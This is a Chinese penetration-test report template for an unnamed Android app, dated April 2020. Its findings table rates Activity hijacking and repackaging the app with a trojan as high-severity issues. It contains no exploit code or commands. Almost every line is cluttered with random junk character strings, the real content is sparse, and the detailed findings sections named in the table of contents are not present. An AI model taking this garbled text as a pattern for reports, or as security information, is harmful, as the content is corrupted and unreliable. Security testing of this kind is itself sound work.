' @2 M; `# |' S+ y8 a5 w
0 r* u# j: _8 X/ ^8 e7 p* t
! E T \1 g6 R: G5 `
6 x1 D/ j" B8 v! S6 ~1 B
! a% x& _1 h* t
4 W$ C, u7 l U4 U s+ F" }
( E( J8 _4 s5 \' \; o- F) m" l9 I, R6 X6 b* t+ V* \
0 x" J6 f8 Q- [9 W9 L
1 e- u% C1 d) q8 e
2 S" T" H9 \8 {" d: D) u6 j" E
* H& q# n6 ~0 O' {8 _) i* \6 n! t% ]3 R 文档编号: 0 {: n9 `6 H6 a, t
; `* G& Y4 C$ z$ {( I. y. o" |) n
- h! Y, {- f4 f; t* x
. @# K. W$ B: A; H! A . A+ r* @8 z' e
9 _4 D$ }% ~" g2 c; @' \! X
+ A% W- v$ F& e
- P" w4 d5 O, m+ x: `
! k+ E6 A! ~5 ^. |) ?' N/ R
: N- m; r1 G6 e2 S8 a, m2 Z
. Z& H4 P. d5 h/ P0 F! }, A6 M
9 H- z7 }1 S7 ^# ^% K; i/ a G
4 P: U" p/ R5 V( F7 T. @. s
1 |' G c& Z4 h
" Z, j& b2 A* ]% T4 {" k, u
* A) |5 x, f. `3 E; o# x# j2 S) { : Z& d" G) I4 g4 l L
+ b/ W$ n, m" g8 X$ q r ! t' o1 _) x9 Q h' i
9 G* F3 }% w! a% o
7 V* o) b- l9 a% c: i
% r! a4 Y4 d2 _0 E9 f! J
7 m. D8 m, |' a( }. X7 U A( M; U
, f4 P1 C1 \( D2 g/ U5 M3 E 4 O7 M( L Z' a6 |! G
: w9 i: F) i% L) ~. S) O
' } b3 ^9 s" Q) v1 v1 `; R7 \& N
) ^: M* V7 T3 S 1 q, G* O+ j w% E- V/ A
, S Y6 v, b. v% @0 [& ~8 D
6 A! X$ W: o# a, m" Y
- [- O; K. S# m2 t
; U; {9 B$ p6 H% M9 c; D
( d% z, u! o; S9 q! ]7 M9 @0 w# S
8 P8 c6 f* ^. _$ j
* D( L; u& A, N+ a9 r! D$ {$ n, s 某某某APP渗透测试
5 Q5 C! ~ F7 {6 s6 p7 t6 R5 Z' }% P% f( B% k1 f* i
3 U3 B& M6 {" S
8 Q4 m8 \" n) ?( ^- ] % H- f' k' y9 ?# |0 {$ `
7 c; Y9 `0 _1 w4 M2 U7 K
4 R2 }- e0 i& U0 e/ m+ p+ k0 p; N( [' o
& d% S% z. `2 P/ r! u+ o2 E7 o8 A/ ~+ h O
6 O" B! s8 h1 b/ A- ~- g
6 r) V* a% t' V9 N) e6 F
% F$ U f2 ? u J+ j: [
. K4 J1 V0 x' V
# u! V; E/ u1 Z$ d% ]1 P7 ]$ |, S$ k% Y
" o* b+ P9 h K1 F9 J% L) p
0 @' z) `3 n1 [7 L: d2 A' x
. j3 _4 o3 Z2 `# g( N9 O! ^7 E6 f
: ^0 G$ l) z* _) P) v0 y
4 l2 o6 {- P a5 l' h: g3 I
& I' q* B' Z- z( b8 c1 z' n
1 {. N6 P6 N; T7 i4 e
( ^5 J/ b9 o+ @1 z8 V8 J8 T6 P
" h: M8 w. N0 s0 |7 ^. K
+ ?- v& h- M+ s: a' H5 t8 S
, K' A( Z3 l$ [ D5 G1 x8 s% Q9 {
. J7 I" j% i; y6 ?* \& A
! P. I/ [0 Y9 V! s) K8 P \4 _, h1 Z
技 术 报 告 Q& M) P' P# @8 w2 d
+ U( v. o0 C5 D3 a4 A/ ?7 U
: z9 k$ I* j; S4 a( ?9 Q
3 A* `; a# ?! x 2 i. X7 }4 c1 N; h( k4 n1 M
' q& g: ?2 {; Y# x3 q, Q" r
8 S9 u# w" R) @" L( B, q7 J: j9 _) c9 d( u* }6 H1 r
& M- s) c4 W! N. m6 }. d
2 G: f4 }9 w4 | ; Z! V7 A3 q _+ F) @
I& E( \( {, z7 }- Z( _& }. x x! M
, D5 P- U! F3 s' Z: k" o2 Q w' Z; A$ {3 C8 A, x( w- g$ e
6 V6 Y; ^& l6 ^; }/ m3 r3 I+ S* U2 J4 k6 d
) d" C Z* P% W& ^: E
& Y8 |9 q0 d' i5 |; S# x; w& z8 d ; H/ U* X: C! y, ^) ^# E, j
0 {6 o4 Q' l& d ?
' S2 @' f, T7 _4 N8 W
8 @; ^9 l4 T& L. H. F! d
+ f1 W4 S% j0 l, x/ n, N; t( U5 o2 n* x2 m Q; U6 G2 S, ^" L
' ]2 N0 W: t' m' @ `# X5 ?7 n8 z
, R, h5 j Q* l# ]" S
) o, K1 R8 J8 c2 q3 W) Z# o
( M8 c: \) E$ u; \9 S, e
! o e; Y, O# y* {6 e0 X
5 s3 i! o& k( \ P" H
+ O" x9 O: z; k5 b( E: D# z7 h, q' Z, }+ a5 J+ I2 }2 C+ _4 ^
) Z, A2 I2 E. ]
5 s; s4 Q2 k! S2 \ ' T. H+ a' C6 x- |) [! \
/ X+ z2 }1 ?7 H+ n# {7 A# C 0 E/ q3 _$ z7 Q0 w
3 i* w1 G9 ]$ p$ H
7 ~& J! @( w: f1 u
# Z6 D1 k% f5 V( O/ r/ T, R9 m9 J r, [5 b4 g y3 w7 n8 Z
! b& p! F/ [: Q1 ?
' n" h! v1 Q, F% j* P- b0 O+ m" }$ l. i, ?2 J. ?/ m8 H% ?. r7 i
3 P, w. ~. L u7 E, ?6 M) v
" b2 g! v ?# z. t* z) ^ 9 G. j" p2 n& R% y
$ P$ g Z4 O/ X2 n
0 O! P- B! a: q K9 Z4 P& F- C' l6 {7 z% p9 W! y2 i
0 Z1 v1 t3 i$ o, P
! F% _7 C/ O" _% a
% \9 n8 @2 }! ~& f. ^6 b* u
6 {& o! K& ~6 B9 O* h# @) _, } N ' U3 Y# J8 R% z/ I0 q/ s' o! ^; ^4 d
( h* \& N% M. q
+ |1 w8 W: z7 C$ [
5 d' B8 w, W' n; v+ ^- l6 N2 d
, Z- L L4 ?' R M3 V/ x
: G$ G2 w- H. F( v
, ]7 V( D! J! N; v5 d& b4 ^
( q3 B: ]" l" R% Q! f* N: t2 v
6 x3 |- s$ K- y% T0 ]% _. u
J n) m: P. Y2 {* B% D1 D# v" f- R5 i 4 D! w1 q$ E& O! G
L& R8 t" C! R g9 z
# I2 I9 r" N/ m2 a' z9 q/ h) O7 l+ j. w2 L
- A* T( X+ o& ^. ~0 a5 h( z/ f; |
( M3 O5 y1 `5 J2 ` ^
2 X! O% D/ V; e: }' t
& R1 Y" v/ E* i6 I& [3 L# F
) X. w3 Z% M) }8 u
2 v. u" L9 @$ G/ y7 A
6 o3 F8 z, ]5 }! l$ f, E ^8 _( R- M5 B. S0 S) C# Z
( @1 D0 }! [0 X+ R3 O$ J6 `8 O8 U: K- |: p6 D! ?
: j4 V1 o0 ~6 j6 ?
, s7 M( p0 Q8 _
; a% y% z* l9 K- G, C9 k; g
# i7 u3 e/ E( {8 R$ C$ S3 H ! z$ q0 z! s) J5 O0 y& y4 A
. ` l. `+ f# b7 n& D
/ i5 ~1 `4 w$ d1 A, _
) s' Q7 `7 e) \/ _- V0 k
4 o' j+ S# {" l0 i% S- D. F% V2 X* j4 F: h; q8 F8 D
) i3 o& `5 N4 b! r& [
) f0 G, d' ^ Q3 ]
0 _: Z) u2 K# X' d, B8 x
% M& K7 o* c$ j
1 ?- }' Q$ }$ t6 y# W/ T( \
" T/ g2 u9 v# A& e
* n9 Y9 q0 H. y( w' T5 N2 g5 ^+ r7 n, S- k5 Q, j) `5 a
$ S' A M/ h% |+ T" I: k; s; l. I+ Z; E) v1 ^
b+ i5 T6 Y5 M% p$ {0 |& n: Z& t- t' e( v( B
( N/ _5 G% K. {% K( Y; q5 v
: A: B- W0 n3 {4 g+ ^ ! N5 T1 w3 @' f$ a. F+ J
% F1 L0 {; Q. L2 g
4 V) ~, u) U. y
) ?) U7 v- I) ?7 q9 G, V- ]3 {
. e+ u3 f- l8 x2 F) D% c
5 b, I+ M- b% v
1 _( M0 O# C4 T0 G
]' [6 \/ s+ B. s
$ ]) ^7 K. g# Z* d) l- A- M( n1 i U4 R3 ]# d
8 Q" {: b8 w- v+ ]
1 C) r- b. r" K1 M" h$ M 二〇二〇年 ) Y& ^% b$ |; ^5 z: A) k
L1 G9 t( c4 e( a' T* q
, O& u( Z ?6 T5 i* j0 w m, i. q0 X% J- C5 j5 D$ o! r
" m( F& N# T* T+ b; P9 O/ G
' M1 M6 Z1 B# \/ u8 d
. y4 t3 `9 x* ^# V `) A8 ~; N- R
3 P) T2 B0 _0 h0 T- `
' s7 s9 Q' g5 {$ W Y M
5 \, Q. a) l I" G* ` # ?2 g; v1 m4 C' ]2 o& c4 T" [
/ S v7 x: |7 R4 }% b
, E. @ z7 E( y* H1 L( j: {
7 R5 M. U& e" C0 J$ o
# t0 L y" D3 _8 ~$ S; z
: ^0 R4 V8 d- |
8 p/ p0 {" J3 e8 x$ Y
4 ~$ Y; Y8 F; v; } b, Y. z- |' ?
, `# ^5 |+ `# Y' k" w% j+ f. a5 @8 E, U; h
- J' i* E/ v# a$ M6 x; b# a1 c8 e2 J3 b9 D5 }& v
目 录
! y) w7 n8 F, V( W$ i0 E" f I8 @3 }. O
8 C& \: _) u7 }* G; t2 @
6 @9 G# A8 ]7 l) Q+ h8 o! ] # X+ E3 n7 `8 N; B# M
9 h1 s9 `. w/ B
, J7 X [% |- e. n2 f6 m1 {/ a- `+ p' O( H3 A* [
7 |& o8 I) I; p; X! ?, U: |% L
v# e9 g, n5 Y2 P! Z9 _! }
3 c* N6 q/ d/ W1 h7 H8 e, ]& R' N3 p( t* y# `, D7 r
% y$ C2 z H, ?; s: r( o1 Z7 r. s2 d% M- B6 `: t
1 概述... 3
' Y1 ?- _; @3 Y% N- B1 U1 X; s {; g' x) ~" Q
S: K6 E6 F: S; [! @7 ?
2 o; |2 \9 j3 Z2 m9 ~: }( {
7 t( p! t6 T6 g7 h, r/ r6 n/ U. T& d& f$ T+ W9 f" Z
1.2测试时间... 3 6 T) v$ S9 T1 w
% C+ m6 ~. X* x) Y1 N: e+ x( ]
# L/ Y. R* y; S! F; o1 X
- y( D) K/ |9 C2 O8 Y3 p
" \6 \/ @; v; [9 H. B# R+ A2 H3 L* B. S0 v5 s
1.3测试对象... 3
# D S6 S5 `: p2 k
% o1 x) A5 O. f9 V
% J# Y. L1 U% w6 e
$ V. i- F: W" ?" y. j U8 h: y" o) a* \2 \- y
7 U/ X- I' w5 ^' ]) L2 {6 ] 1.4测试结果... 3 A, E$ p6 |2 m
$ d) m! U5 h3 I$ b% C, o
4 ]2 Q5 ]. ~) r7 Z
% ?2 u0 I9 w1 X7 V8 i; y; | - z: b9 F' f7 V' g
- T* m' { g- r4 z 2 检测结果... 4
s& G0 f6 T# d+ Z5 X* o0 S
- U( j, B* B6 `- G
7 i+ n) \0 r4 Z5 D+ ~6 i2 n9 r0 ^, [& j* h+ |
' P4 f$ w3 s- x7 h3 O& N- f/ v, C
( }: g: C* Q. I" _ 2.1 某某某... 4
2 b" E0 L/ q6 M! a$ l J6 m H
# }/ t7 a$ L% U$ Z* T, C$ @& B; Q
- N% M" E9 s$ o# v
( E, P, B1 d1 V" k# B
' ?0 R+ o% J. ^- f# A$ o7 L4 x+ R! J* e6 M
2.1.1检测目标... 4 0 T' ~/ @# i) y2 a- a% j
$ T; L8 e& j3 a; g# n( @
7 L/ G: q2 N: B+ B& h5 q* m' Z3 j* Z" N2 M% m' j# |. d
' G9 K5 @' ]+ o4 s, E7 O
- y' F6 K. y' P! y, A 2.1.2检测结果... 4 1 @2 ?6 Q |% h" H1 S
, t; w! N3 ]9 A0 H9 ~6 s N8 B; U
9 X5 P$ H0 [& o! X) c2 v" `) T+ J- n$ {: z9 m% s6 U
# l" I' U* O# s' c
" H+ N* f. ^, k* v J 2.1.2.1. 4
! L: c( t4 {5 a& Y7 \
! v4 t5 T1 {8 G/ y2 w7 o
7 r- [' `2 U! @- u1 R; i4 x9 i `' G9 \0 A6 M/ _0 d$ T* e
# L& S' Y* z. M" j# k* R" I2 b" z2 J
2.1.2.2. 6
. l5 W) h+ S7 h0 K7 P, Y0 }
) q/ y) K0 ^' y' n' \
% f" e6 u3 M2 v: I& ]4 W# v
+ Y; G1 D. i9 E/ d: v: z
3 j! l; c, {- p# {( f/ V6 L3 r0 \8 d0 Z5 \! ~- c% A
! x% j/ r2 ?, }: d
& \3 e3 r5 E) N+ f$ P
# Z, I- z- G; @ V2 ] X, A1 }7 a7 K S
# N6 P" E6 U& w4 Q; k# M& f7 P J- s+ G0 u) ~5 b! X3 a1 n/ q
# \" V9 S7 X6 V6 _6 ^# b
. a/ u9 _" m4 @0 ?6 T
, [# r( _+ ]5 i- X( s
# `. _. G( p/ I& E- h0 o* j! s) p1 ?
2 O) ^/ E. V0 ? L6 X, t d+ c8 f8 Z( `9 ?; j
: U [% a+ c& O7 l) c! Y
- C6 ?! N9 b- C% a r 1 概述
0 c3 ?9 j7 ]8 \9 x
- U( Q, E7 W0 G( N2 q
! W- w. U/ W& p2 ?: h0 k: S
* M+ c) {; n, G) h8 g8 ]
, b- e- `0 V* }3 c$ D( a/ @
1 G! ~9 i) @ o' m0 D 1.2测试时间
4 _$ ^ s7 X, q/ N: j
* U* _+ `& c5 p- }3 q! |( B e ?( c
* x7 t6 g5 s5 A# s& E3 j
5 c' @; `* U U/ T ; ~+ H* J5 q: F; C
0 M |- H7 W1 f4 M- Z! A
9 N _% J$ r5 k- N* T
, j9 ^, S& g7 X* V( C0 U / l y1 G# M5 |: X
9 `% D5 Y4 |* `; T7 \ c* u* G0 W
| - C+ h' U3 u# I+ ]! _
6 p% [0 p2 o. w' y8 }+ l 3 O6 g/ S7 ?; g; M; u+ c
% e" y0 L. r$ t4 S 渗透测试时间
" p0 d' V; u5 a) S2 O k
: r/ I; ]- Q. T7 A/ d% j & J! U% A. H& w: @, {7 y' a
4 o: e+ }' l" W! v z! @2 X5 a- w( N
|
+ y7 Y) W3 N2 A- N4 v$ u# k) {+ K/ N0 h7 T
/ O' P5 {9 o# s& q' r$ |8 [% b% n' G" n. |. W8 e2 h
0 G8 @" n( q# e7 w" F8 j& z
' z- I2 h+ n2 [: z- [$ A6 a( o! i | 2 X% r+ x O2 `, T# u
5 ]1 z6 o$ r3 G7 t
8 T& L( I( b% m1 X! K6 P2 ^0 i0 b! }2 Z9 o- C7 M7 E
起始时间
& h; N* }) c( v
: k5 r8 h! a8 g4 E. ?0 N. w0 g 0 y, G9 [) C" X5 ?9 O
5 m1 M& [' @8 J, K1 t9 f
|
1 X5 G% }, W: J4 t# F/ r# r1 U" X; i2 L
& M7 H h* [2 F% X' r
V7 u- c/ l0 ?9 d$ ^8 y$ o
) ^/ }1 D/ J9 ]1 ^8 F
R f3 u" }) V" e2 ~' A S9 B 2020年4月6日 ; ]$ j$ n' i0 R$ Z5 X
2 G$ S% ]' ]2 c( Y# o5 ?# E1 {4 V0 H
* T. T, Y: i4 S# c a9 v. N
2 m4 Z$ X% Z# e) ]. } D+ E4 w! x+ q | 2 _2 g1 o: r$ H5 B( H ]
* C7 {% R/ u4 ^/ t1 q
4 A+ h0 Q5 O2 x; ~3 ~ W+ I% r u2 b; o+ B
4 Q; p) ^$ _/ E; I8 x
5 A: y$ V2 ^6 ]+ N" Y
| , B( W' b9 A" L% f* b. v
0 z! {4 d' `. R; t, K9 ?- @
0 g2 P& P8 @* E5 K& D) H
! @6 \$ F- M1 S6 q- w 结束时间 ) s/ r* o: a _1 m" l
H/ a8 g/ }6 Z* g6 g) W6 l % Z! w& ?7 h! C& _! M
6 c/ o5 @) J+ X5 e& o1 Y" B7 A |
: A7 B7 X1 h9 s; a% r/ ^" V7 e0 K/ X( {. F2 N
+ c+ I/ N, G: f B! m
I# s: {$ @, F$ f/ z. Z; W
/ ^1 \' _9 ~2 R
2 Y6 T- R0 }* V' A7 U) X8 u 2020年4月9日
% W' Z# d- v- f/ J$ Y2 ]. n; A7 o$ D$ t
/ }# P& r: g. g, \& u- `5 I
1 v% R- X: I$ }8 J |
0 u9 i# u2 H2 i, T- k+ S7 L7 X$ @8 O+ Z5 ~6 b
/ l3 F Y+ L, _9 W, y2 ]* d: T0 a) G) k0 g! x
% w7 b, N8 ?3 Y
7 e( y `! _& o W" K2 p
+ Q$ g! z4 i8 k" K$ n/ w
' [/ a1 R2 G) h
8 U# F$ f" h2 ^2 k/ i. s% D7 N
% \% H& b8 @6 i) g7 z; s 1.3测试对象
3 A4 F8 [+ w8 v9 Q7 h4 E
( h ^# H% d+ v% S# ]0 W
) O- M; B4 @& l# T+ }! R- m
, d, w0 |& q; ?1 h7 |
# ^" G4 o* j& U7 |$ p! l
5 q/ @% \) s: m3 y( w 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
7 @3 t7 m! Z9 b! }( o
7 Q& P* Y3 Y4 X' H& r
9 W1 u1 z# g0 d' @
* [! B M0 Y6 A" t, H0 C
/ r* N5 H; c* p
- A0 X* u1 E# T& \" m# w 表1-1 检测对象 ( z+ c6 Z3 F! x' N! |# S
6 {4 a) E5 A/ t- q( d6 d; q
1 p6 v. P4 M9 ]! O- G! m# U! c
# Q. o3 J- P3 t+ p9 J
* O2 G" [( b' b* x0 h2 c: l3 Z# A7 M" j$ U9 R3 d4 C; K- [# Z
6 T: \1 v" {7 I$ |7 ?
/ ^7 C" J8 l% G" _0 W6 ~
5 E7 X8 s4 s5 ]3 p5 J; d: K0 U5 \0 l& ?3 |
| 9 {% F2 `+ {# {/ A1 u: K! K- t0 m8 _; f; o
3 A& B8 z) e1 W
( R7 g t: ^3 X+ d/ `9 N/ M, s) }9 \; B" p' A8 O1 g
序号
8 i6 b$ C# g ?$ S% n) \3 a' l0 T8 r+ @& @' a) ^
1 S; v0 i& N" W5 V- l
( I1 I! _% C+ x |
+ [8 r5 l9 K8 h' Y# `- o7 W& ?; W2 {. K, T- S- [+ O
$ {* Y' x' D% t% K8 x0 K$ p5 Z( o5 f" n& m. r
" l9 v/ l' o v9 B% {
) D! O3 A# g0 l6 i
测试对象
% i" S+ v0 E' \; ~' _. C
+ J' I6 i5 w1 \* m' I h
2 y$ \6 d2 w% N2 }* E' u! v* n9 a! C
| : J$ T! G' ^8 ^# b
8 j& {" n. c. ~& R
* h/ v: N3 H6 [+ U& j' D+ B0 e
! b( |7 \5 U \1 U
$ D5 g# n. o" A( B% Q" ?& [* n+ _, p- g2 |+ c' g
测试地址 - s! `" S1 s9 @. v0 i
" `( x7 S" C6 g) m* O2 s3 Z0 d $ p7 `% ?2 W9 [0 H( v/ e
2 G+ f4 Q6 M' Q" B | 1 @+ @% S+ A! K7 ], A
- k- u' B( l2 V+ _, i3 }+ [0 y/ P & O9 ?) G$ p0 a# a5 C: j* ]6 U
' l5 s) N& f1 ]5 ?/ O
. I9 P/ R4 D* [ L* f
% b! V' }2 d& p+ |) V 安全漏洞
0 L( B7 ?) {+ D- F3 S( h$ e( f- U0 d
' B, Z8 W8 ^# d ~) }2 j * g% Y6 ^6 y [3 p7 c1 Y: o
+ c! s& T; m9 f |
/ \: z% n4 h6 P" y, ?( {6 P
' r v1 s) m k' c. w& Z" ?
7 Q& {1 `1 P1 c! _
# r, v$ N4 W4 w9 x, u; @ ' U6 w9 Q1 `% T5 f
7 W- c* ~0 @$ c' M |
* F3 n; ~1 S- b$ H, I3 k- O6 ^, E5 T
1 W% C$ \* S* H* ]9 O# G/ |: j
/ h3 C1 o0 ]( }9 g; T+ p 1 $ u! l& s7 l7 u7 f0 l
! i3 l2 T9 B/ K0 F* |, p! T; t: `2 G: j
" K7 l, T* t% f% q- d
& ~" R0 R4 E" s; `( E |
2 x' F8 z+ d T. c
7 {# }, E4 r3 O8 T3 [: n% Z. D , ?* Y# i, E3 l+ ?
+ |& M4 D% v( {! ]: Z
. ~, ~/ G& Q4 i: J9 a9 F: `9 V/ J7 p' V2 \0 b2 b
某某某安卓APP : k3 d, g. P8 x+ |$ V& G
' t- T- x5 y3 Y6 E; O6 V7 s
% X9 d" N8 P0 H0 E0 L; I
7 f- {% Y. S9 F/ _9 b$ c: R |
- h" a1 e+ _3 }7 P5 n' K
' V0 y2 U9 j5 V3 Y' r6 X9 Q! K
# I: N0 v' X& q3 m' r" m+ q/ e' O1 h' h, e6 o8 Y) m7 V
0 v% E7 n5 t3 b9 @" K9 o9 i7 E3 G+ L5 F& V I( K
$ t! a: g4 X7 @ m6 v
$ ^: L% C- N2 b! @ y( K0 l
3 S/ |. |/ y5 W r4 p0 [& w
8 d0 f. ?: O1 o/ @9 J( _4 X |
' q; f5 y& m% p1 |: C+ ? D+ F3 n0 x4 S9 L& l0 k, B
$ d' k+ m5 ~% t/ e+ m/ g" [: w' H% v$ @
9 U9 a, O* J2 @( b) _' P+ E# c3 K' `5 }1 s
2
& K' U$ C, S6 w# p9 V+ E, l4 X( _1 L# X( {
) {& Z6 c) \ }1 F# V H
3 ^5 T1 e u( b
| e) o; G! n( B+ z
* [- _( d( n* B" y7 b4 r' W
: C6 n/ P) p. N. H/ t/ ~$ J6 M# c$ Y# c1 j5 U; g! \8 ?/ a
! [0 {1 ~7 z7 R+ l6 O) y4 p3 O3 R
/ b! D$ U; }: l; u
0 S' i' r4 q6 o" U9 T7 F+ E: H% ` t
0 `- t# o; i1 }- e. H7 I- m * t4 g1 w+ o( M/ O" N8 b& k
1 n$ C& X& `6 k& D/ x; [ 1.4测试结果 8 l5 ~) ? x& C+ t2 t
# d( a8 e/ l* w6 v- B* B# g7 s
9 f6 v/ y& ?( y2 a: A1 r
& a) I0 E! B" ~2 |( b; y
U( ]; J, G$ o9 i* K- Z
6 W0 Z& ?8 {$ N# \( s9 o) s 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
( E" f0 r2 H0 x2 C# x4 T# V: u, E8 R% h1 F) r: L" w4 ?4 V& S
* |) Q* {+ A* g( P. j/ h2 v4 E8 X* g" g! H# ]1 P& p) [
! ]& C( H4 K- A# L, k( @- q
; J0 l8 O4 L$ l: n$ E$ o 9 Q2 R. _ w% ^
6 d$ S# ]* `* b
6 ~9 _# g. F5 R C* l7 m ]
/ X: u+ t. X" m& k
8 Z; k! }% ?5 ]! x& v2 C* O5 T3 g" W: ]
9 _4 j- a0 G8 m9 |/ |* A' A* [
3 P5 q6 S6 l, d4 A% u
% z; o( S$ z% g" ?" Y) } " z, W! d5 ^- Z7 F: E( f
. \ j p H' D# f- g4 N
( N3 t+ u+ m$ T; C. h8 F$ \& }9 Z% m: d
|
2 p7 i* a$ X2 }- \" H+ f7 x
) V$ U$ M1 I# n
) m7 \ q4 }& }) K9 f1 b3 B$ ]! [. m
, j+ e# l5 o6 ]* C7 H 序号
5 I" b; ?2 x$ d7 M7 w: W9 i8 _5 N9 z* x
" f' `2 \' C# m& I8 o8 ]
. Y9 Y! Y7 m: [+ x4 x5 Q, K
| 7 }$ o7 E/ E7 W, l! }2 }3 Z- O
A0 L+ ^1 v; x0 }" s0 G# Q
, H g8 x, n# _# S( m
7 l- G% z: y9 a! i+ H- M+ q, h
+ D) s' e/ ]. a
3 p E& t% ?% u
系统名称 8 q4 w( K$ V; P' L9 A% |# _0 X
: G8 b/ p b" B& f5 } , g8 M8 h) ~0 P6 x
4 q7 x1 b/ {9 A8 Q: ?# Q$ v" N9 A5 D
| }" V. _0 G* v) ?; v
5 q& e6 u( T" b. ?) T
9 k% Z' w3 _# ^0 p
: U/ q7 c" r. Z( K, [8 {7 W: D
: [7 o0 o8 V; o) y7 @& B U/ ^% h U7 I! } y" z
漏洞名称 ) _1 p4 v) e- _7 o2 }; o" d, U
/ o. C- v3 c9 `6 S6 X$ k) x
L9 q5 N' R# G# o
* [& h' T0 R7 `/ [, G+ E. f0 ] |
/ ` U8 I/ Q$ }" x1 P$ s/ s
7 a9 q5 M8 P7 D7 K : K, Y( p8 u) h9 l+ ^8 p" I/ D! O6 ~
2 M2 l) g/ W, S2 w" D; k) e8 Y
0 L" M% w D' k. @
; L3 q8 T# ^3 P$ l0 F' E8 m 漏洞危害
1 `4 t3 m! ^, p T5 J
1 t" v3 L; o/ @0 l) m, H, l& G) m$ X $ H/ {, y! l( S( w5 U6 u6 R
6 v( s: D% G0 C$ q) w9 ~0 r$ G) r# i
| # S; p) J A( ^
/ |. ]4 B! |0 ~0 V) {6 y$ f% {
, W4 k. ~& I, g% G/ i2 z% h# b
& E( b" D, @8 O" J: R: t
+ w% Q0 |+ }, G( _9 t' @1 H8 c8 l! e0 z- l2 f, G$ C+ y. n
修复结果
. G4 ?0 N( b8 B
1 u' {: O' ]* v5 f
. f: Q, [# P/ r/ d! _- N
) j p) D( }- Y/ W. Z: P |
; q# ]+ i) r+ G. e/ P' Z% P0 W3 S! A+ V$ L8 P" r9 C, R
7 n, r$ D3 B7 v+ @! ^7 ]
8 D* a5 z, c$ U: ?' T. G2 R. c $ N }$ c/ J: ]0 @! T
) ?% G4 N2 H# F, L1 X' `& [; \ |
" t* d. A, H' Y4 |) `9 }
" J% q( Q/ j0 M1 N/ T% [- T 0 S: Y2 @$ U1 r g- B
4 i. f1 _) ~) O3 R/ B. `. `
1 ; ]' {% ?8 ^" u% ~/ n3 s8 a
2 h* f3 l* }( B' q: Y* h
& w8 _& B' c( d- Z8 q, x4 H
' B- [& r7 f1 L+ N! {) U |
' P$ n8 ] I+ P, C7 f
" r; t; h, l- D# N5 U1 w, C
: i# k' `' P5 J8 k7 G o8 N2 n9 y" p# b. s. k
. Y9 p y% i) k
" y& I5 }$ o) U# G7 s q3 j
某某某某某某APP : u w$ I# e7 G. }# G0 q
2 U" T: f- [1 D4 ]6 F. J) x' n/ ^
: s( @' v2 I$ Y8 g8 e
/ s' r v7 L' R+ j9 Y |
& S: B9 [3 Y* H3 o* B5 S0 I( p/ A/ y* Z& E
7 L5 j4 m$ b7 b$ R2 g" |0 a4 ^
; e* W4 y7 v. W! N) a : N" X4 U7 f/ S' @
* X1 Z0 h/ V8 |) k5 Y; h Activity 劫持
* D& [( z& C8 L9 S! C! ~% [9 _
# m+ ^! X/ T: P2 o
: `" [) `( B, s* d% I6 W' }. u/ M: q& D6 N% } R
# E+ ?' q7 B* k! S' j0 o# L: r
0 f }! f' y6 s6 Q3 x' T + T( g+ L6 N0 Z. W
{( A8 m8 x6 f) z7 p ; A) W4 F, R' D& H
; A( ^# [6 m% h* M! c | 2 X1 ^/ a# _1 z: f
5 A* s+ Q4 G7 U y: N3 m 6 N' X) t9 G0 |' [, `& i! x
( F+ P/ H" a$ F+ j
+ r3 w: X2 B" d
( G* M. k' v, q" N; \2 C 高 " o) ~) U1 P7 E z
* b+ r! S* @+ B v# `& s+ W" n2 H
- x& h- |3 m, y* f. `# Q u, }
. r3 |9 h2 ? ^# ` Y- D | 9 }+ m$ H. r2 A7 {9 N
$ R) f8 C% Y6 m \" e' Y/ { X3 h
/ s9 ^3 @, N4 ^/ r! H
3 ^- j6 k- ?, C+ y/ y0 V0 D+ q 1 G1 m' W- m1 u& I
7 s2 H- F3 s0 @6 z u4 ~8 U
% P. n$ h# N+ R- g& n+ S9 S9 @* B
H# U2 f; w" m" Y1 D 8 ?$ r! o4 L; V: m) P g V
: H5 D' W9 @3 v. { |
% W- n. q( n$ `2 K
% g* t5 {, V+ e6 H9 }
8 p. [1 ^* _% {6 [1 P4 ]% ]# z m1 k7 H& e. i8 b. |
$ L8 t; G3 G; S4 d. D
R6 k* R0 ]5 P$ ~" a | 9 S0 a; A3 M* J1 I7 E! Y8 N
' ~, p' d9 s, [& e- Q
; Y( S# P0 I' L. U5 `" X4 {
" D& G! B" E, ^, V+ _ 2
1 M8 Q) {8 F# w& \) G1 c
! j' F$ s2 W. a, i
5 i. S, c* `4 B
/ n4 q% _" T6 _& C5 j |
& L+ X! x4 k' @! H. v7 w' o
2 Q. r* Q, h* ~7 U
4 S6 G9 a+ N' I0 K) b: r: }3 |" v: C+ b! j* k
. u" D: T7 f* _# o+ `& i
* h$ m |% F3 n# ^8 k) O: B 某某某某某某APP 2 F- I, a6 S0 P& L
/ W1 }. @1 q q5 L* }& S
2 G7 y, m V: y' {( r! t6 Y1 \
# F& R1 ~9 j# n6 m: i6 D/ `' R | 4 I/ o1 I1 X* ?3 v& I$ P
5 c$ B% Z$ q3 g0 n5 _
- T2 T' D+ r% y, [8 l0 x! G
& p% S: a1 s/ W
' M; A# @8 k* c4 L- _
6 Z4 i9 b1 k; I; c; G 反编译二次打包捆绑木马、篡改APP代码
9 _$ U7 f* p: ^9 [, x
/ M1 `3 e7 Z2 y1 o
9 i9 [# ^( |6 x+ B1 X$ N4 U5 F+ X! C
+ b- M6 I* L3 B: q, R) g8 r | 9 z+ O7 I: u( [6 }' q
- Z' F, B+ Q9 S# ?7 p* z" e
# q- U. r6 |1 _- J8 c) r4 L' `' m x# A; E
w, _* H# h7 r
7 ?' w9 d6 p; w+ d
高
8 N) n* |: j' `" Y% t, B8 G9 C" I* M. ~
) P" [' g& _( X2 o/ O( l7 A$ k3 O
7 V C; V, v- y6 j, s; F8 ? |
/ F6 c% {7 r* M/ Z
% _# J: M: |8 p ( O& z$ v9 r8 J, P1 ]
* Y0 |; X: ^; |. ^7 e" e
5 M4 V# T' A3 M5 t2 _6 M! C2 B
- K8 P" l! o# k: O- v! h C 3 \- A: y) g/ q F8 W& Z
6 g2 b# h, X' ]$ r& Y7 u" I0 X b
# c c S8 [- [. m3 `" X! Y8 P
4 Y5 a/ r7 p. q9 ^- j0 w
|
# P; s4 f3 T" I& Y% k, @7 b: a- t! j9 V _9 b3 x! e
' }: }: w1 I5 { A3 \8 Q( n) ~* l. ?8 x- m9 O& N
" j8 ?! q% U( y7 w% g
0 j1 s' U% L3 R5 w
3 J" _% s! J$ B; g
6 [" \. ?; L, N1 R/ X
' r& e/ X7 h. `
+ h( G/ V C6 x: c6 u8 K; O
- b' S5 \ j5 X
